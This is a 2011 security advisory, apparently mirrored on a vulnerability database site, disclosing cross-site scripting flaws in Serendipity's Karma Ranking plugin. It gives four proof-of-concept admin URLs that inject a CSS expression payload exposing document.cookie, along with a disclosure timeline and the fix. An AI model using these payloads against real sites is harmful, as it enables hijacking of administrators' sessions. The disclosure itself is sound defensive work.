Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27276
HistoryNov 06, 2011 - 12:00 a.m.

Serendipity Plugin 'Karma Ranking' Multiple Cross-Site Scripting

2011-11-0600:00:00
vulners.com
103
JSON

Advisory: Serendipity Plugin 'Karma Ranking' Multiple Cross-Site Scripting vulnerabilities
Advisory ID: SSCHADV2011-017
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.5.5 with Karma Ranking Plugin version 1.1
Vendor URL: http://www.s9y.org
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:

Multiple parameters in the Karma Ranking plugin (Serendipity backend) are prone to a Cross-Site Scripting vulnerability

==================
Technical Details:

Successfully tested with Internet Explorer 8

http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][ip]=3&serendipity[filter][title]=3&serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!±

http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=3&serendipity[filter][ip]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][title]=3&serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!±

http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=3&serendipity[filter][ip]=3&serendipity[filter][title]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!±

http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=3&serendipity[filter][ip]=3&serendipity[filter][title]=3&serendipity[filter][user_agent]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!±

=========
Solution:

Upgrade to Serendipity 1.6

====================
Disclosure Timeline:

22-Sep-2011 - informed developers
27-Oct-2011 - fixed by vendor
02-Nov-2011 - release date of this security advisory

========
Credits:

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:

http://www.s9y.org
http://blog.s9y.org/archives/233-Serendipity-1.6-released.html
http://www.rul3z.de/advisories/SSCHADV2011-017.txt

JSON